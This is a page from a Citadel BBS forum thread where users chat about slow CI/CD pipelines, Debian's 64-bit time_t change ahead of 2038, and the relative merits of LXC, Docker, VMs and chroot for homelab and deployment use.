Language:
switch to room list switch to menu My folders
Go to page: First ... 88 89 90 91 [92] 93
[#] Mon Feb 12 2024 11:04:44 EST from LoanShark

[Reply] [ReplyQuoted] [Headers] [Print]

Now if you sent it up to your CI/CD pipeline, we will probably be in

the next ice age before it finishes. What's with those things anyway?


Each build node tends to be hosted on whatever AWS instance type has sufficient RAM to get the job done, meaning you're only going to have from 2 thru 8 hardware threads, typically.

[#] Mon Feb 12 2024 11:05:44 EST from LoanShark

[Reply] [ReplyQuoted] [Headers] [Print]

2024-02-02 15:28 from LadySerenaKitty
Recompiling FreeBSD kernel and world only takes a few hours on older
hardware.  Mere minutes on newer stuffs.

I struggle to believe that's accurate if you're talking about a full desktop env including browser etc.

[#] Mon Feb 12 2024 18:09:24 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

Each build node tends to be hosted on whatever AWS instance type has

sufficient RAM to get the job done, meaning you're only going to have

from 2 thru 8 hardware threads, typically.

Maybe that's it. All I know is that the pipeline runs at glacial speed no matter what I put into it.

[#] Sat Mar 02 2024 23:15:11 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]


Here's something interesting.

[ https://wiki.debian.org/ReleaseGoals/64bit-time ]

Debian is changing `time_t` to 64-bits on all 32-bit architectures except i386.

Seems like they've decided that i386 isn't going to be around in any significant way when the 32-bit time_t rollover happens on 2038-Jan-19. They might be right. It's less than 15 years away. They seem to believe that 32-bit ARM is the one architecture that is likely to still be in somewhat widespread use by then, simply because it's in so many embedded devices.

It's an interesting read. They're aware that it's going to cause problems and trying to figure out just how much of a problem and where it will be.

I can tell everyone for certain that Citadel has time_t values embedded in its on-disk database format, so if you're running Citadel on 32-bit ARM you should probably dump your database and reload it on 64-bit before they make the change. If you're running it on 32-bit i386 (like I am...) you have until 2038 to do that.

And hopefully there either won't be a transition to 128-bit computing, or it'll happen long after we're dead. I can't envision a use for an address space wider than 64-bits, but I'm sure they said that about 32 and 16 at one time.

[#] Sun Mar 03 2024 07:08:43 EST from Nurb432

[Reply] [ReplyQuoted] [Headers] [Print]

I thought Debian dropped 32 bit support anyway in the last release. 

Perhaps i was wrong



[#] Mon Mar 04 2024 09:27:30 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

Red Hat (and Fedora) and Ubuntu have stopped building i386, SuSE still builds it but doesn't officially support it, but Debian still has an i386 build.
However, they don't seem to be concerned over i386, expecting that i386 will be well and truly out of service by 2038.

This is more about 32-bit ARM, which is anticipated to continue as a nice way to make embedded systems smaller. Memory savings could be up to 30% in some cases. So they've decided to "break" time_t to keep the architecture alive past 2038.

Interestingly -- someone was forward-thinking enough to make time_t 64-bits when running on 32-bit RISC-V. So that architecture won't have a problem at all.

[#] Tue Mar 05 2024 11:49:04 EST from Nurb432

[Reply] [ReplyQuoted] [Headers] [Print]

FreeBSD 13.3-RELEASE    out today.. ( or at least i just got the notice )



[#] Wed Mar 06 2024 22:19:03 EST from IGnatius T Foobar

Subject: Ok I admit it, LXC doesn't suck

[Reply] [ReplyQuoted] [Headers] [Print]


So after all this time I finally decided to give LXC a try. I installed it on kremvax (which is what I named my new microserver) and am playing around with it now. I figure I've got plenty of time to experiment because this machine won't be running production workloads until I get the rest of the hardware in a few months ... particularly the rest of the disk drives and a battery backup.

Under the covers it's obviously using the same kernel primitives as Docker ... cgroups and stuff like that ... but it's designed to run containers that resemble real OS images rather than specific applications. I did something like this in the Ancient Times before I had hardware virt, using OpenVZ (which was how you did it back then). Y'all probably already know this because a lot of you are ProxMox fans, and that has a big LXC thing.

I'll probably still run KVM on this machine to support FreeBSD and (ugh) Windows once in a while. I did have to remove Docker because it was messing with the iptables configuration. That's going to need some tinkering.

For fun, see if you can ping playground.v6.citadel.org (IPv6 only).

[#] Thu Mar 07 2024 10:24:45 EST from LoanShark

[Reply] [ReplyQuoted] [Headers] [Print]


kremvax. I haven't heard that one in a minute.

[#] Thu Mar 07 2024 17:50:59 EST from Nurb432

Subject: Re: Ok I admit it, LXC doesn't suck

[Reply] [ReplyQuoted] [Headers] [Print]

at least im not alone :) 

libvirt has been known to kill my WiFi on a laptop.  ( ended up just removing it instead of fixing it..  didnt really need it on there. just virt-manager )

Wed Mar 06 2024 22:19:03 EST from IGnatius T Foobar Subject: Ok I admit it, LXC doesn't suck

. I did have to remove Docker because it was messing with the iptables configuration. That's going to need some tinkering.


 



[#] Fri Mar 08 2024 09:22:23 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

kremvax. I haven't heard that one in a minute.

It's a little nod to those who remember. :)

And I did get Docker running again. The issue was that installing Docker creates a set of iptables rules to support its default networking configuration, which can't be removed. I had no rules in place at all yet, so no IPv4 traffic was forwarded to/from my test container. Interestingly, I had plenty of IPv6 because Docker didn't touch the ip6tables forwarding rules.

I do like that it is trivial to *fully* bridge an LXC container to the host network, to the point where DHCP and SLAAC just work as expected. Docker's bridged networks can't do that.

In the end I'll need both, though. Docker is good at running packaged containerized applications and when I move my hosting stuff over here I want to run the Docker version of Citadel. I'll probably use LXC for development and for experiments and other homelab type stuff. I'll probably also try to run the VPN router in LXC.

[#] Fri Mar 08 2024 15:46:31 EST from Nurb432

[Reply] [ReplyQuoted] [Headers] [Print]

I still prefer full VM... 

Ya, im old school  



[#] Fri Mar 08 2024 19:14:35 EST from zelgomer

[Reply] [ReplyQuoted] [Headers] [Print]

2024-03-08 20:46 from Nurb432 <nurb432@uncensored.citadel.org>
I still prefer full VM... 

Ya, im old school  


Same. This namespace stuff all feels too loosely coupled, it seems like it's easy to accidentally allow leaks. I'm not comfortable with the UID mapping gimmick, either. And if I'm not sandboxing for the security, then I don't see what it offers that I can't do just as well and much simpler with chroot.

[#] Sat Mar 09 2024 13:16:42 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

It depends on why you're building them. Multitenancy still works best with virtual machines. Without multitenancy requirements, most people just want logical separation between their workloads, so you don't for example have an application blow up because you upgraded the libraries for some other application on the same machine, or because you have conflicting network ports, or whatever.

That's why containerized applications are so popular. They isolate applications from stepping on each other without having to emulate an entire machine.

I am moving back to containers simply to be able to have dev/test/stage/prod in different (emulated) filesystems and on different IP addresses without the overhead of putting VM block devices on top of the host filesystem etc etc etc.

[#] Sun Mar 10 2024 16:08:09 EDT from darknetuser

[Reply] [ReplyQuoted] [Headers] [Print]

Same. This namespace stuff all feels too loosely coupled, it seems

like it's easy to accidentally allow leaks. I'm not comfortable with

the UID mapping gimmick, either. And if I'm not sandboxing for the

security, then I don't see what it offers that I can't do just as well

and much simpler with chroot.



IMO the selling point of stuff like Docker and LXC is not isolation. It is that you can package a clusterfuck application or service as an image and be sure it will run on anything that supports the corresponding container technology.

It also makes disaster recovery easier since the application and its data tend to be decoupled - specially for Docker, not so much with LXC. With Docker, you create a recipe for your application and upload it to a repository, then you have some mechanism for backing up the data from that application. If you need to upgrade the application, you upgrade the recipe in the repository and deploy from it. If your server is destroyed because a pony sneaked into the house and started playing with it, you just re-deploy using the recipe in the repository and the backup data from your storage.

I don't think containers make much of a difference for a small deployment. Unless you are using some application that comes packaged as an image, you may as well run the stuff on virtual machines, which nowadays are very resource-efficient and don't mess with your namespaces.

By the way, feel free to ask me to post docker spam since they indirectly sponsor me.

[#] Sun Mar 10 2024 17:19:19 EDT from zelgomer

[Reply] [ReplyQuoted] [Headers] [Print]

What you guys described, how do namespaces make any of that easier to implement than chroot?

[#] Sun Mar 10 2024 18:11:21 EDT from darknetuser

[Reply] [ReplyQuoted] [Headers] [Print]

2024-03-10 17:19 from zelgomer
What you guys described, how do namespaces make any of that easier to

implement than chroot?



For starters, Posix chroot is escapable by design. Chroot is also uncapable of doing anything beyond filesystem separation. You don't get to have a separate nerworking space for your application with chroot alone.

Other than that, applications tend to be distributed as docker images rather than chroot builds, so...

[#] Sun Mar 10 2024 20:00:55 EDT from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

chroot is only part of the picture. cgroups give you other types of isolation.
netns gives you a separate network stack. None of these are intended to be rock-solid "inescapable". They're only there to let you partition your resources up in a way that makes sense for the workload.

Like the pony said in less flattering terms, Docker lets you distribute an application and its dependencies in a way that makes it easy to deploy and avoid the "it works on my machine" failure mode. Yes, you could also distribute your application as a virtual machine image, but then you're on the hook for providing operating system updates along with your application, whereas with a container you just keep generating new container builds, often through some automated CI/CD pipeline.

Containers have taken the IT world by storm and, amazingly, there is an open source, industry-wide standard (Kubernetes) for running them at scale in any environment. That
's a pretty awesome place to be when you consider how much vendor lock-in has always been the rule of the land.

LXC is another story. I am experimenting with it because I (note: *** I ***) intend to run dev, test, stage, prod (or whatever) on the same machine, with loose separation between environments. I don't need multitenancy, I just need each environment to have its own filesystem and its own IP addresses.
And so far that's working nicely. I made /var/lib/lxc a btrfs subvolume and can do nightly thin-snapshots easily. Since it will be a few months before I move production over here, I have some time to muck about with it before I commit to that style of deployment. But so far I like what I have.

[#] Sat Mar 16 2024 14:20:08 EDT from Nurb432

[Reply] [ReplyQuoted] [Headers] [Print]

so, is minix development dead at this point?

Been going thru my backups ( moving files around a bit, and getting rid of stuff i really dont need... cleared out over a TB so far )  and noticed that my folder for it was pretty old.. went to update.. nope.. still really old.



[#] Sun Mar 17 2024 17:31:20 EDT from darknetuser

[Reply] [ReplyQuoted] [Headers] [Print]

2024-03-16 14:20 from Nurb432
so, is minix development dead at this point?

Been going thru my backups ( moving files around a bit, and getting
rid of stuff i really dont need... cleared out over a TB so far ) 
and noticed that my folder for it was pretty old.. went to update..
nope.. still really old.


I think the last RC is from 2017. Wikipedia lists it as abandoned.

https://hackaday.com/2023/06/02/is-minix-dead-and-does-it-matter/

Go to page: First ... 88 89 90 91 [92] 93